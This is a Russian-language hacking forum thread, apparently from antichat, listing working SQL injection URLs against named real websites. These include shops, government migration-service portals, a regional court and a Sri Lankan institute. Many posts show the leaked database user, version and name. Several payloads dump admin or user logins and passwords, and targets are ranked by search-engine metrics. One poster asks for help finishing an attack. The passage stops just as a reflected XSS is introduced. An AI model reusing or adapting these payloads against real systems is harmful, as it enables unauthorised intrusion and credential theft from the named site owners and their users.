SQL Инъекции

Code:

http://ecom-info.spb.ru/news/index.php?id=-757+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(user(),version(),database()),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+

ТИЦ 600
PR 4


==============================

Code:

http://villa-beliv.com/room.php?id=-4+union+select+1,2,3,4,version(),6,user(),8,9,database()+--+

=============================

Code:

http://vladdepo.ru/buy.php?id=-47+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11+--+&make=show

 

Магазин UltraPrice. Компьютеры, комплектующие, ноутбуки, цифровая техника, акустические системы для домашнего кинотеатра. Минск.

Code:

http://www.ultraprice.by/popups/service.php?id=-10+union+select+group_concat(u_name,0x3b,u_passwd)+from+admin_user+limit+0,1+--+

 

Code:

http://www.gorod312.ru/press/news/?mode=show&id=-415+union+select+1,2,concat(version(),database(),user()),4,5,6,7,8,9,10,11--

[email protected]

 

Code:

http://novufms.ru/content.php?id=-14+union+select+1,concat(user(),0x3a,version()),3,4--

novufms@localhost:5.0.51a-24+lenny5

Code:

http://www.mvpvo.ru/inner.php?id=-1+union+select+1,2,concat(user(),0x3a,version()),4,5,6,7,8,9,10,11,12--

[email protected]:5.0.95-log

 

Code:

http://www.chel-oblsud.ru/?html=news&nid=-1328+/*!+and(select+1+from(select+count(*),concat((select+(select+concat(version(),0x3a,user()))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from information_schema.tables+group+by+x)a)*/

5.0.95-log:chel-oblsud@localhost1

 

Code:

http://www.zuppatheatre.com/members.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9--

 

Code:

http://www.ufmsko.ru/view.php?id=-1+union+select+1,2,concat(user(),0x3a,version()),4,5,6,7--

root@localhost:5.0.45

Code:

http://www.ufms72.ru/index.php?catalog=-79'+union+select+1,2,3,concat(version(),0x3a,user()),5,6,7,8,9,10+--+

5.1.46-log:[email protected]

 

Помогите доковырять!
http://avtochast. ru/cardescr.php?carid=874&mod=&typeid=-9563+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53

 

есть специальная тема https://forum.antichat.ru/thread46016.html

 

HTML:

kompromat.flb.ru/material1.phtml?id=-153+union+select+1,concat(version(),0x3a,user()),3,4,5,6,7,8,9,10,11+--+

file_priv = Y

ТИЦ (kompromat.flb.ru) 425
ТИЦ (flb.ru) 2700

 

http://www.mhfan.fr/news.php?id=-5+union+select+1,2,3,group_concat(concat_ws(0x3a3a,pseudo_user,mail_user,mdp_user)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users+limit+0,20--

 

http://www.autosystem.com.ua/news.php?id=-7+union+select+1,2,3,concat_ws(0x3a3a3a3a,user(),database(),version()),5,6,7,8+--+

[email protected]::::autosystem_nissan::::5.1.68-log

 

proskater.ru - Самый крупный в Раисие интернет скейтшоп.
ТИЦ 275
PR 3

Code:

[B]POST[/B] http://www.proskater.ru/shopping_cart.php?action=update_product
[B]DATA[/B] products_id[]=1029188{1}539'+benchmark(20000000,sha1(1))+'&cart_delete[]=1029188{1}539

Code:

Host IP:	89.108.91.9
Web Server: 	nginx/0.7.65
Powered-by: 	PHP/5.3.2-1ubuntu4.17
Current DB: 	db_proskater

Чтобы крутить надо быть залогиненым.

 

Журнал "Родина"

Code:

http://www.istrodina.com/rodina_articul.php3?id=3014&n=142+union+select+1,2,version%28%29+--+ 

Версия: 4.0.27-log

 

Arthur C Clarke Institute for Modern Technologies, Katubedda, Moratuwa

Code:

http://www.accimt.ac.lk/news_details.php?id=-13+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--

 

Code:

http://www.right2lifelanka.org/new/newsview.php?id=-138'+union+select+1,2,concat(user(),database()),4,5,6,7,8+--+

r2llanka_user@localhostr2llanka_main

Code:

http://legacyera.com/wp-content/plugins/formcraft/form.php?id=1+union+all+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11--

legacy_jordan@localhost:legacy_wp

Code:

http://www.southcrest.org/wp-content/plugins/formcraft/form.php?id=1+union+all+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11--

[email protected]:southcrest_org

 

ФК Локомотив Ташкент

Code:

http://lokomotiv.uz/news.php?id=-794+union+select+@@version,2,3,4,5,6,7,8,9,10,11,1  2,13,14,15,16,17,18,19,20,21,22--

 

Не нашел названия скрипта партнерки и сайт производителя, но на иденичном коде есть крупные проекты:

скрипт: work-task-read.php

переменная:?adv=

запрос:

Code:

-158%27 union select 1,2,concat_ws%280x3a,id,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from tb_users+limit+1,1+--+
 

Зависимость: аккаунт в системе.

Живой пример:

_ttp://mvdbux.ru/work-task-read.php?adv=
-158%27%20union%20select%201,2,concat_ws%280x3a,id,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20tb_users+limit+0,1+--+

 

Code:

http://www.accimt.ac.lk/news_details.php?id=-13+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--

 

Может кому интересно будет, тут присутствует еще одна уязвимость - отраженная XSS: